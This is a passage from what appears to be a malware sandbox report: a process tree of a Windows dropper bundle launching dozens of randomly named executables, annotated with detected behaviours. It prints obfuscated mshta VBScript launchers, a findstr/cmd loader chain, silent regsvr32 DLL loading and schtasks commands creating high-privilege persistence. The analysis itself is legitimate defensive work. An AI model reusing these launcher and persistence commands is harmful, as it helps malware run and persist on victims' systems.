C:\Users\Admin\Documents\vqkX4MoIEugaQwAA_sGcx7mY.exe"C:\Users\Admin\Documents\vqkX4MoIEugaQwAA_sGcx7mY.exe"11⤵PID:6844
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 28012⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8124
-
-
-
C:\Users\Admin\Documents\jNnKv6mul3RDLHYdVP9s8S4N.exe"C:\Users\Admin\Documents\jNnKv6mul3RDLHYdVP9s8S4N.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6836
-
-
C:\Users\Admin\Documents\ffurMiTvStSKihzvFKZBOaxR.exe"C:\Users\Admin\Documents\ffurMiTvStSKihzvFKZBOaxR.exe"11⤵PID:6828
-
C:\Users\Admin\Documents\ffurMiTvStSKihzvFKZBOaxR.exe"C:\Users\Admin\Documents\ffurMiTvStSKihzvFKZBOaxR.exe"12⤵PID:7876
-
-
-
C:\Users\Admin\Documents\JpzQpBam12FjgZJbPq6PqOMl.exe"C:\Users\Admin\Documents\JpzQpBam12FjgZJbPq6PqOMl.exe"11⤵
- Adds Run key to start application
PID:6820 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:7120
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:7392
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:2016
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:3944
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.comRimasta.exe.com J14⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4684 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe15⤵PID:1152
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Executes dropped EXE
- Runs ping.exe
PID:1180
-
-
-
-
-
C:\Users\Admin\Documents\XVyUGS0EX5y5IR80T1KyhsI5.exe"C:\Users\Admin\Documents\XVyUGS0EX5y5IR80T1KyhsI5.exe"11⤵PID:6812
-
-
C:\Users\Admin\Documents\NmTuLy0tRRsfQXm0z0Nrx4jX.exe"C:\Users\Admin\Documents\NmTuLy0tRRsfQXm0z0Nrx4jX.exe"11⤵PID:6804
-
-
C:\Users\Admin\Documents\SJRSdb5cd2oV00fU3qlTLIkJ.exe"C:\Users\Admin\Documents\SJRSdb5cd2oV00fU3qlTLIkJ.exe"11⤵PID:6796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 29212⤵
- Program crash
PID:7648
-
-
-
C:\Users\Admin\Documents\bccxViOktUBc_JeMhcjmt5ub.exe"C:\Users\Admin\Documents\bccxViOktUBc_JeMhcjmt5ub.exe"11⤵PID:6788
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"12⤵PID:1196
-
C:\Users\Admin\Documents\7s3pLsi4PcHM2gWlM_8rlUrn.exe"C:\Users\Admin\Documents\7s3pLsi4PcHM2gWlM_8rlUrn.exe" /mixtwo13⤵PID:6796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6796 -s 28014⤵
- Program crash
PID:6676
-
-
-
C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe"C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe"13⤵
- Executes dropped EXE
PID:5640 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )14⤵PID:444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\m8mrKjXeyTMqbsozcD72tmQK.exe" ) do taskkill /Im "%~NxB" /F15⤵PID:5128
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "m8mrKjXeyTMqbsozcD72tmQK.exe" /F16⤵
- Kills process with taskkill
PID:8808
-
-
C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXEGZ9~4QZ~O.EXe -P6_oIH__Ioj5q16⤵PID:8800
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )17⤵PID:9192
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F18⤵PID:1560
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S17⤵
- Loads dropped DLL
PID:6760
-
-
-
-
-
-
C:\Users\Admin\Documents\RrWW8wrpKOB43y47VBaEOsvw.exe"C:\Users\Admin\Documents\RrWW8wrpKOB43y47VBaEOsvw.exe"13⤵PID:7108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7108 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8308
-
-
-
C:\Users\Admin\Documents\X_rTg5DPUFVmqdnrfX8Yo9bu.exe"C:\Users\Admin\Documents\X_rTg5DPUFVmqdnrfX8Yo9bu.exe"13⤵PID:8416
-
C:\ProgramData\3643010.exe"C:\ProgramData\3643010.exe"14⤵PID:7416
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7416 -s 229215⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5764
-
-
-
C:\ProgramData\2624611.exe"C:\ProgramData\2624611.exe"14⤵
- Suspicious behavior: SetClipboardViewer
PID:6976
-
-
C:\ProgramData\6080168.exe"C:\ProgramData\6080168.exe"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4240
-
-
C:\ProgramData\4100750.exe"C:\ProgramData\4100750.exe"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵PID:444
-
-
-
C:\ProgramData\8817677.exe"C:\ProgramData\8817677.exe"14⤵PID:9020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9020 -s 248415⤵
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3448
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:7812 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6132
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:4384
-
-
-
C:\Users\Admin\Documents\wGYNsb64ZBHISiHNwpu7Ju1A.exe"C:\Users\Admin\Documents\wGYNsb64ZBHISiHNwpu7Ju1A.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6780
-
-
C:\Users\Admin\Documents\h934b5vABM6XPH2_Qd5AJ_TU.exe"C:\Users\Admin\Documents\h934b5vABM6XPH2_Qd5AJ_TU.exe"11⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\{9E5B360E-96E3-47E8-B156-1F21770D977D}\h934b5vABM6XPH2_Qd5AJ_TU.exeC:\Users\Admin\AppData\Local\Temp\{9E5B360E-96E3-47E8-B156-1F21770D977D}\h934b5vABM6XPH2_Qd5AJ_TU.exe /q"C:\Users\Admin\Documents\h934b5vABM6XPH2_Qd5AJ_TU.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{9E5B360E-96E3-47E8-B156-1F21770D977D}" /IS_temp12⤵PID:7440
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{4175BAA6-49B9-43E5-8B49-E892979E209E}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="h934b5vABM6XPH2_Qd5AJ_TU.exe"13⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6384 -
C:\Users\Admin\AppData\Local\Temp\MSI61F9.tmp"C:\Users\Admin\AppData\Local\Temp\MSI61F9.tmp"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1052
-
-
C:\Users\Admin\AppData\Local\Temp\MSI61F8.tmp"C:\Users\Admin\AppData\Local\Temp\MSI61F8.tmp"14⤵PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\MSI61E7.tmp"C:\Users\Admin\AppData\Local\Temp\MSI61E7.tmp"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:7300
-
-
-
-
-
C:\Users\Admin\Documents\fp7oOqd_Hi5sCI0g6sN5Bg9_.exe"C:\Users\Admin\Documents\fp7oOqd_Hi5sCI0g6sN5Bg9_.exe"11⤵
- Suspicious use of SetThreadContext
PID:7072 -
C:\Users\Admin\Documents\fp7oOqd_Hi5sCI0g6sN5Bg9_.exe"C:\Users\Admin\Documents\fp7oOqd_Hi5sCI0g6sN5Bg9_.exe"12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7480
-
-
-
C:\Users\Admin\Documents\8rusiN7o2yUAEEWZHjgxtUiq.exe"C:\Users\Admin\Documents\8rusiN7o2yUAEEWZHjgxtUiq.exe"11⤵PID:7040
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 25612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4312
-
-
-
C:\Users\Admin\Documents\IgxZc4krwxSWTzRtM93776c_.exe"C:\Users\Admin\Documents\IgxZc4krwxSWTzRtM93776c_.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:6948
-
-
C:\Users\Admin\Documents\ojg_nJibKClpW1PPkdFye6aG.exe"C:\Users\Admin\Documents\ojg_nJibKClpW1PPkdFye6aG.exe"11⤵
- Suspicious use of SetThreadContext
PID:6880 -
C:\Users\Admin\Documents\ojg_nJibKClpW1PPkdFye6aG.exeC:\Users\Admin\Documents\ojg_nJibKClpW1PPkdFye6aG.exe12⤵PID:3136
-
-
-
C:\Users\Admin\Documents\MvXiIkogY50_cdybfWtI9Jim.exe"C:\Users\Admin\Documents\MvXiIkogY50_cdybfWtI9Jim.exe"11⤵PID:7760
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bhleyghb.2ef\gcleaner.exe /mixfive & exit9⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5932 -
C:\Users\Admin\AppData\Local\Temp\bhleyghb.2ef\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bhleyghb.2ef\gcleaner.exe /mixfive10⤵PID:584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 28411⤵
- Program crash
PID:6732
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evj00jzf.5md\bumperWW1.exe & exit9⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\evj00jzf.5md\bumperWW1.exeC:\Users\Admin\AppData\Local\Temp\evj00jzf.5md\bumperWW1.exe10⤵PID:1140
-
C:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exe"C:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exe"11⤵
- Suspicious use of SetThreadContext
PID:7064 -
C:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exeC:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exe12⤵PID:1088
-
-
C:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exeC:\Users\Admin\Documents\ab7eO_QtCg5f6ErhKa4OKp_v.exe12⤵PID:6404
-
-
-
C:\Users\Admin\Documents\izlZwVVv7MAPxS3UqznpIV6H.exe"C:\Users\Admin\Documents\izlZwVVv7MAPxS3UqznpIV6H.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7056
-
-
C:\Users\Admin\Documents\hkjpYFjP9bVIn4WBepYz8Wg9.exe"C:\Users\Admin\Documents\hkjpYFjP9bVIn4WBepYz8Wg9.exe"11⤵PID:4964
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:7340
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Nobile.docm12⤵PID:7604
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:7268
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm14⤵PID:5592
-
-
C:\Windows\SysWOW64\PING.EXEping localhost14⤵
- Runs ping.exe
PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comRimasta.exe.com J14⤵PID:7116
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.com J15⤵PID:2440
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.com J16⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7940 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.com J17⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.com J18⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6328 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.comC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Rimasta.exe.com J19⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5748 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\RegAsm.exe20⤵PID:5620
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Documents\Lf5UxicTZlD4o96NYzRIs63z.exe"C:\Users\Admin\Documents\Lf5UxicTZlD4o96NYzRIs63z.exe"11⤵PID:7172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7172 -s 26412⤵
- Program crash
PID:5744
-
-
-
C:\Users\Admin\Documents\DG8GzoYgQfLoegqyShuVPq92.exe"C:\Users\Admin\Documents\DG8GzoYgQfLoegqyShuVPq92.exe"11⤵PID:6164
-
-
C:\Users\Admin\Documents\7DRf1GgimLLyTVlf4heIfgQg.exe"C:\Users\Admin\Documents\7DRf1GgimLLyTVlf4heIfgQg.exe"11⤵PID:3428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 28412⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6256
-
-
-
C:\Users\Admin\Documents\v64oKiMH7HZN96MLrVZd7TYl.exe"C:\Users\Admin\Documents\v64oKiMH7HZN96MLrVZd7TYl.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:472
-
-
C:\Users\Admin\Documents\hibkxFCwwIU1jT3ewPqSHPZH.exe"C:\Users\Admin\Documents\hibkxFCwwIU1jT3ewPqSHPZH.exe"11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Program Files directory
PID:6492 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST12⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Creates scheduled task(s)
PID:6788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST12⤵
- Creates scheduled task(s)
PID:5732
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"12⤵PID:6884
-
C:\Users\Admin\Documents\zvYn2b2RMlprOptQUPTiAZmN.exe"C:\Users\Admin\Documents\zvYn2b2RMlprOptQUPTiAZmN.exe"13⤵PID:8276
-
C:\ProgramData\5409542.exe"C:\ProgramData\5409542.exe"14⤵
- Suspicious behavior: SetClipboardViewer
PID:1064
-
-
C:\ProgramData\5419501.exe"C:\ProgramData\5419501.exe"14⤵PID:8652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8652 -s 215215⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5772
-
-
-
-
C:\Users\Admin\Documents\pIoAAElCoI4F3FowXm9RyEM9.exe"C:\Users\Admin\Documents\pIoAAElCoI4F3FowXm9RyEM9.exe" /mixtwo13⤵PID:8268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8268 -s 28014⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6720
-
-
-
C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe"C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe"13⤵PID:8308
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )14⤵PID:8496
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\Users\Admin\Documents\yejz2Q_cRuWCm7QE3eMQgp8Y.exe" ) do taskkill /Im "%~NxB" /F15⤵PID:8632
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "yejz2Q_cRuWCm7QE3eMQgp8Y.exe" /F16⤵
- Kills process with taskkill
PID:9020
-
-
-
-
-
C:\Users\Admin\Documents\ifvoURscOZRZbnytP8tl8GJW.exe"C:\Users\Admin\Documents\ifvoURscOZRZbnytP8tl8GJW.exe"13⤵PID:8260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8260 -s 27614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5400
-
-
-
-
-
C:\Users\Admin\Documents\N6d7vwkJD7di8y2YzmlHm9kF.exe"C:\Users\Admin\Documents\N6d7vwkJD7di8y2YzmlHm9kF.exe"11⤵PID:1728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 28412⤵
- Program crash
- Enumerates system info in registry
PID:6500
-
-
-
C:\Users\Admin\Documents\xA3ufDa4echp_zyYV66dK7fh.exe"C:\Users\Admin\Documents\xA3ufDa4echp_zyYV66dK7fh.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2348
-
-
C:\Users\Admin\Documents\8k7lbjcfaEBIytDMvlzCVJxi.exe"C:\Users\Admin\Documents\8k7lbjcfaEBIytDMvlzCVJxi.exe"11⤵
- Suspicious use of SetThreadContext
PID:3776 -
C:\Users\Admin\Documents\8k7lbjcfaEBIytDMvlzCVJxi.exe"C:\Users\Admin\Documents\8k7lbjcfaEBIytDMvlzCVJxi.exe"12⤵PID:6540
-
-
-
C:\Users\Admin\Documents\rtk3sX09oybmTouiBz9UXGd1.exe"C:\Users\Admin\Documents\rtk3sX09oybmTouiBz9UXGd1.exe"11⤵
- Suspicious use of SetThreadContext
PID:5244 -
C:\Users\Admin\Documents\rtk3sX09oybmTouiBz9UXGd1.exe"C:\Users\Admin\Documents\rtk3sX09oybmTouiBz9UXGd1.exe"12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5896
-
-
-
C:\Users\Admin\Documents\0yJpgquDz9I9CKoKLL7ABgWP.exe"C:\Users\Admin\Documents\0yJpgquDz9I9CKoKLL7ABgWP.exe"11⤵PID:1608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 24412⤵
- Program crash
- Enumerates system info in registry
PID:7120
-
-
-
C:\Users\Admin\Documents\EqgctWZrpmm977WZG4hINXcc.exe"C:\Users\Admin\Documents\EqgctWZrpmm977WZG4hINXcc.exe"11⤵PID:6228
-
-
C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe"C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe"11⤵PID:7360
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )12⤵PID:7836
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\5q0JMbw_TkaXVjjffuWZA1Qh.exe" ) do taskkill /f -im "%~nxA"13⤵PID:8012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "5q0JMbw_TkaXVjjffuWZA1Qh.exe"14⤵
- Kills process with taskkill
PID:6652
-
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV14⤵PID:4796
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )15⤵PID:7896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"16⤵PID:6976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵PID:7604
-
-
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj15⤵
- Loads dropped DLL
PID:8868
-
-
-
-
-
-
C:\Users\Admin\Documents\gjPH9Yi1ACf2Oh4NPfKVffGG.exe"C:\Users\Admin\Documents\gjPH9Yi1ACf2Oh4NPfKVffGG.exe"11⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\{8DA2FD35-695A-41AA-83CE-859738839BA3}\gjPH9Yi1ACf2Oh4NPfKVffGG.exeC:\Users\Admin\AppData\Local\Temp\{8DA2FD35-695A-41AA-83CE-859738839BA3}\gjPH9Yi1ACf2Oh4NPfKVffGG.exe /q"C:\Users\Admin\Documents\gjPH9Yi1ACf2Oh4NPfKVffGG.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{8DA2FD35-695A-41AA-83CE-859738839BA3}" /IS_temp12⤵PID:7972
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{4175BAA6-49B9-43E5-8B49-E892979E209E}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="gjPH9Yi1ACf2Oh4NPfKVffGG.exe"13⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:8036 -
C:\Users\Admin\AppData\Local\Temp\MSI7DAF.tmp"C:\Users\Admin\AppData\Local\Temp\MSI7DAF.tmp"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4136
-
-
C:\Users\Admin\AppData\Local\Temp\MSI7DAE.tmp"C:\Users\Admin\AppData\Local\Temp\MSI7DAE.tmp"14⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7116
-
-
C:\Users\Admin\AppData\Local\Temp\MSI7D9D.tmp"C:\Users\Admin\AppData\Local\Temp\MSI7D9D.tmp"14⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:6444
-
-
-
-
-
C:\Users\Admin\Documents\_O0bEPOGtORtfFHIQa5GW8TH.exe"C:\Users\Admin\Documents\_O0bEPOGtORtfFHIQa5GW8TH.exe"11⤵PID:7772
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axpdkbul.rvw\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:1616
-
-
